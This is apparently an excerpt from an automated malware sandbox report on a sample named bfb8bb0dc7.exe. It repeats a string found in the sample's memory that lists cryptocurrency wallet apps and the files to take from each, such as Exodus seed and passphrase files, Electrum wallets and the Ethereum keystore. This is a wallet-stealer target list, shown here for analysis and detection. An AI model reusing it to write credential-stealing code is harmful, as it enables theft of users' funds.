Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
